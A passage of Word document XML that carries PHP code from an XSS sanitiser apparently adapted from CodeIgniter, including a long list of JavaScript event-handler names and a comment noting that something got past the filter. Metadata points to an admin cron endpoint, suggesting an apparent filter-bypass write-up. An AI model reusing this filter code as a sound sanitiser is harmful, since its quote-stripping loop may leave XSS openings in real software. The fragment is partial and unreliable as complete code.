        <w:t xml:space="preserve">        //</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A17A42A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        ////有东西通过了上面的过滤器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3801B99F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = $this-&gt;_do_never_allowed($str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353AE4D9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="2F6A3BBD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="19829283" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        // now the only remaining whitespace attacks are \t, \n, and \r</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413B5EB1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $ra = ['onabort', 'onactivate', 'onafterprint', 'onafterupdate', 'onbeforeactivate', 'onbeforecopy', 'onbeforecut', 'onbeforedeactivate', 'onbeforeeditfocus', 'onbeforepaste', 'onbeforeprint', 'onbeforeunload', 'onbeforeupdate', 'onblur', 'onbounce', 'oncellchange', 'onchange', 'onclick', 'oncontextmenu', 'oncontrolselect', 'oncopy', 'oncut', 'ondataavailable', 'ondatasetchanged', 'ondatasetcomplete', 'ondblclick', 'ondeactivate', 'ondrag', 'ondragend', 'ondragenter', 'ondragleave', 'ondragover', 'ondragstart', 'ondrop', 'onerror', 'onerrorupdate', 'onfilterchange', 'onfinish', 'onfocus', 'onfocusin', 'onfocusout', 'onhelp', 'onkeydown', 'onkeypress', 'onkeyup', 'onlayoutcomplete', 'onload', 'onlosecapture', 'onmousedown', 'onmouseenter', 'onmouseleave', 'onmousemove', 'onmouseout', 'onmouseover', 'onmouseup', 'onmousewheel', 'onmove', 'onmoveend', 'onmovestart', 'onpaste', 'onpropertychange', 'onreadystatechange', 'onreset', 'onresize', 'onresizeend', 'onresizestart', 'onrowenter', 'onrowexit', 'onrowsdelete', 'onrowsinserted', 'onscroll', 'onselect', 'onselectionchange', 'onselectstart', 'onstart', 'onstop', 'onsubmit', 'onunload'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC817F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        foreach ($ra as $t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF0ACC4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            $str = str_replace(' '.$t.'="', ' '.$t.'=', $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1520CDEC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26888DCF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="5FB50514" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E90CA06" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A32863" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="3551407F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>// --------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09241C82" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="49666EEF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BA9A24" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * Do Never Allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B856AF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E237EF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @used-by</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>CI_Security::xss_clean()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988CD26" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @param </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20331847" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> * @return </w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63371DBA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C62C7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>protected function _do_never_allowed($str)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E64FF3" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895E716" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="49CEE73F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $str = str_replace(array_keys($this-&gt;_never_call_str), $this-&gt;_never_call_str, $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A34D4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = str_replace(array_keys($this-&gt;_never_allowed_str), $this-&gt;_never_allowed_str, $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1973CB" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="417C173A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>foreach ($this-&gt;_never_allowed_regex as $regex)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5093D5CD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527DE91F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = preg_replace('#'.$regex.'#is', '_\\0', $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43652753" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA2658F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="631EE096" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>$str = str_replace($this-&gt;_never_call_str, array_keys($this-&gt;_never_call_str), $str);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329AB8D4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="74B16ACA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>return $str;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555AB60D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406F581" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="6A05151A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="60076BF9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487A46C5" w14:textId="59BC990A" w:rsidR="00723954" w:rsidRPr="00F122AF" w:rsidRDefault="00723954" w:rsidP="00F122AF"/>
    <w:sectPr w:rsidR="00723954" w:rsidRPr="00F122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B4"/>
    <w:rsid w:val="00074D8C"/>
    <w:rsid w:val="000E36EB"/>
    <w:rsid w:val="002F6202"/>
    <w:rsid w:val="00304E3E"/>
    <w:rsid w:val="003F681F"/>
    <w:rsid w:val="005231E3"/>
    <w:rsid w:val="006940AB"/>
    <w:rsid w:val="00723954"/>
    <w:rsid w:val="00927104"/>
    <w:rsid w:val="00A80226"/>
    <w:rsid w:val="00B5655A"/>
    <w:rsid w:val="00B85BFD"/>
    <w:rsid w:val="00F122AF"/>
    <w:rsid w:val="00F86DAB"/>
    <w:rsid w:val="00F928B4"/>
    <w:rsid w:val="00FF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82B76"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{81A837FF-7BB6-4E2D-87FF-593B64A1F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F122A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802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2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7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0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0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://host:port/Admin.php?c=Cron&amp;m=add" TargetMode="External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23</Pages>
  <Words>3271</Words>
  <Characters>18647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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>cp</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-27T05:31:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-27T12:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>